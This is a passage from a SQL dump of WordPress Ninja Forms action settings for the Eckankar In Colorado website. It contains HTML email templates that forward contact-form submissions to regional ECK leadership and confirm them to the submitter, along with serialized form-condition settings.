valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Northwest Colorado Leadership Communications</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Northwest Colorado Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_69}Â {field:lastname_70}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_69}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_70}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_71}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_72}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_73}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_76}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_77}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Northwest Colorado Leadership Communications</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Northwest Colorado Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_69}Â {field:lastname_70}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_69}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_70}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_71}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_72}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_73}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_76}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_77}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(1885,72,'attach_csv','0','attach_csv','0'),(1886,72,'email_format','html','email_format','html'),(1887,72,'reply_to','','reply_to',''),(1888,72,'cc','','cc',''),(1889,72,'bcc','','bcc',''),(1890,72,'redirect_url','','redirect_url',''),(1891,72,'success_msg','','success_msg',''),(1892,72,'label','Admin Email','label','Admin Email'),(1893,72,'objectType','Action','objectType','Action'),(1894,72,'objectDomain','actions','objectDomain','actions'),(1895,72,'editActive','','editActive',''),(1896,72,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1897,72,'payment_gateways','','payment_gateways',''),(1898,72,'payment_total','0','payment_total','0'),(1899,72,'tag','','tag',''),(1900,72,'email_message_plain','','email_message_plain',''),(1901,72,'drawerDisabled','','drawerDisabled',''),(1902,72,'parent_id','18','parent_id','18'),(1903,73,'title','','title',''),(1904,73,'key','','key',''),(1905,73,'type','save','type','save'),(1906,73,'active','1','active','1'),(1907,73,'created_at','2018-01-03 11:44:41','created_at','2018-01-03 11:44:41'),(1908,73,'label','Save Form','label','Save Form'),(1909,73,'objectType','Action','objectType','Action'),(1910,73,'objectDomain','actions','objectDomain','actions'),(1911,73,'editActive','','editActive',''),(1912,73,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1913,73,'payment_gateways','','payment_gateways',''),(1914,73,'payment_total','0','payment_total','0'),(1915,73,'tag','','tag',''),(1916,73,'to','{wp:admin_email}','to','{wp:admin_email}'),(1917,73,'reply_to','','reply_to',''),(1918,73,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1919,73,'email_message','{fields_table}','email_message','{fields_table}'),(1920,73,'email_message_plain','','email_message_plain',''),(1921,73,'from_name','','from_name',''),(1922,73,'from_address','','from_address',''),(1923,73,'email_format','html','email_format','html'),(1924,73,'cc','','cc',''),(1925,73,'bcc','','bcc',''),(1926,73,'redirect_url','','redirect_url',''),(1927,73,'parent_id','19','parent_id','19'),(1928,74,'title','','title',''),(1929,74,'key','','key',''),(1930,74,'type','email','type','email'),(1931,74,'active','1','active','1'),(1932,74,'created_at','2018-01-03 11:44:41','created_at','2018-01-03 11:44:41'),(1933,74,'date_updated','2016-01-15','date_updated','2016-01-15'),(1934,74,'attach_csv','0','attach_csv','0'),(1935,74,'email_format','html','email_format','html'),(1936,74,'reply_to','','reply_to',''),(1937,74,'cc','','cc',''),(1938,74,'bcc','','bcc',''),(1939,74,'redirect_url','','redirect_url',''),(1940,74,'success_msg','','success_msg',''),(1941,74,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(1942,74,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1943,74,'to','{field:email_156}','to','{field:email_156}'),(1944,74,'email_subject','Northwest Mountain Area Initiators and ESAâs','email_subject','Northwest Mountain Area Initiators and ESAâs'),(1945,74,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_154},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Northwest Mountain Area ECK Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_154}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_155}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_156}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_157}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_158}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166754232}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_162}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_154},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Northwest Mountain Area ECK Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_154}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_155}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_156}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_157}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_158}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166754232}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_162}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(1946,74,'label','Send copy to user','label','Send copy to user'),(1947,74,'objectType','Action','objectType','Action'),(1948,74,'objectDomain','actions','objectDomain','actions'),(1949,74,'editActive','','editActive',''),(1950,74,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1951,74,'payment_gateways','','payment_gateways',''),(1952,74,'payment_total','0','payment_total','0'),(1953,74,'tag','','tag',''),(1954,74,'email_message_plain','','email_message_plain',''),(1955,74,'parent_id','19','parent_id','19'),(1956,75,'title','','title',''),(1957,75,'key','','key',''),(1958,75,'type','successmessage','type','successmessage'),(1959,75,'active','1','active','1'),(1960,75,'created_at','2018-01-03 11:44:41','created_at','2018-01-03 11:44:41'),(1961,75,'date_updated','2016-01-15','date_updated','2016-01-15'),(1962,75,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>'),(1963,75,'from_name','','from_name',''),(1964,75,'from_address','','from_address',''),(1965,75,'to','{wp:admin_email}','to','{wp:admin_email}'),(1966,75,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1967,75,'email_message','{fields_table}','email_message','{fields_table}'),(1968,75,'attach_csv','0','attach_csv','0'),(1969,75,'email_format','html','email_format','html'),(1970,75,'reply_to','','reply_to',''),(1971,75,'cc','','cc',''),(1972,75,'bcc','','bcc',''),(1973,75,'redirect_url','','redirect_url',''),(1974,75,'label','Success Message','label','Success Message'),(1975,75,'objectType','Action','objectType','Action'),(1976,75,'objectDomain','actions','objectDomain','actions'),(1977,75,'editActive','','editActive',''),(1978,75,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1979,75,'payment_gateways','','payment_gateways',''),(1980,75,'payment_total','0','payment_total','0'),(1981,75,'tag','','tag',''),(1982,75,'email_message_plain','','email_message_plain',''),(1983,75,'parent_id','19','parent_id','19'),(1984,76,'title','','title',''),(1985,76,'key','','key',''),(1986,76,'type','email','type','email'),(1987,76,'active','1','active','1'),(1988,76,'created_at','2018-01-03 11:44:41','created_at','2018-01-03 11:44:41'),(1989,76,'date_updated','2016-01-19','date_updated','2016-01-19'),(1990,76,'from_name','Northwest Mountain Area Initiators and ESAâs','from_name','Northwest Mountain Area Initiators and ESAâs'),(1991,76,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1992,76,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(1993,76,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(1994,76,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Northwest Mountain Area Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for theÂ <em>Northwest Mountain Area ECK Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_154}Â {field:lastname_155}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_154}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_155}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_156}<br /><br /><br />\r\n </span><span style=\"color: 